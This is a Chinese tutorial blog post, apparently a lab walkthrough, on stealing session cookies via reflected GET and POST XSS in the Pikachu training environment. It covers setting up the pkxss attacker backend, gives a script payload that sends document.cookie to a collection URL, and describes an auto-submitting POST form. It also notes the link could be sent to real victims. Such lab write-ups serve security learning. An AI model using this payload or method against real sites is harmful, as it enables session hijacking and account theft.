zoukankan      html  css  js  c++  java
  • Web安全之利用XSS漏洞进行cookie获取

    攻击者后台的搭建

    首先我们搭建攻击者后台用于接收我们获取到的cookie信息,这里我们用的后台是是pikachu自带的pkxss后台

    打开pikachu网址找到管理工具点开xss后台

    接着再点击安装初始化即

    点击进入首页,输入账号密码登入就完成了

    get型xss:获取cookie


    攻击流程图:

     这里我的攻击者服务器受害者服务器和漏洞服务器都为127.0.0.1:801

    由于每个攻击者端口不同,这里我们要修改pkxss后台文件中的xampphtdocspkxssxcookie下的cookie.php文件

    将其中的ip地址修改为漏洞服务器地址

     接着再另一个页面中打开pikachu登入到pkxss的后台

     接着开始get型xss的利用,打开pikachu的反射型xss(get)页面,这里我们准备一个js的payload

    <script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

    这段js代码利用DOM里面的document.location的实例来做一个重定向,一旦用户去访问页面这段js就会去访问我们pkxss的后台,访问时顺便把cookie给带过去

    而且利用了DOM里面的document.cookie来获取本地的cookie(ps:反射型xss(get)输入框有字符数量限制,之前又说过如果解决)

    然后将这段js代码输入提交即可

    点提交之后页面跳到了首页,这时我们已经成功获取到了用户的cookie了

    然后我们来到之前打开的pkxss页面,点开cookie搜集刷新一下页面

    在实际场景当中我们可以把这段URL发送给用户,一旦用户在浏览器里面访问了这个链接,用户的cookie就会被发送到我们的后台

     post型xss:获取cookie

    其实和反射型的xss一样的,只是提交post方式提交的,并不会在URL里面传送参数 ,所以我们无法将我们的恶意代码嵌到URL里面去发送给目标,我们可以在bp里抓包查看一下

    攻击原理流程图

     首先我们点到反射型XSS(post)页面登入一下

    接着pkxss的文件xampphtdocspkxssxcookie的post-html中的漏洞服务器器和攻击者服务器修改成我们的自己的地址

    这样我们这个自动提交post表单的页面就构造好了

    只要我们让用户点这个这个我们构造好的会自动提交post请求的表单就可以获取到用户cookie

    http://127.0.0.1:801/pikachu/pkxss/xcookie/post.html

  • 相关阅读:
    [每日短篇] 1C
    项目Alpha冲刺 Day12
    项目Alpha冲刺 Day12
    [转载]MVC中单用户登录
    GitLab
    Git 版本控制
    Jenkins持续集成
    Jenkins安装
    Docker 网络基础原理
    java中内存的使用
  • 原文地址:https://www.cnblogs.com/DxyG/p/13252457.html
Copyright © 2011-2022 走看看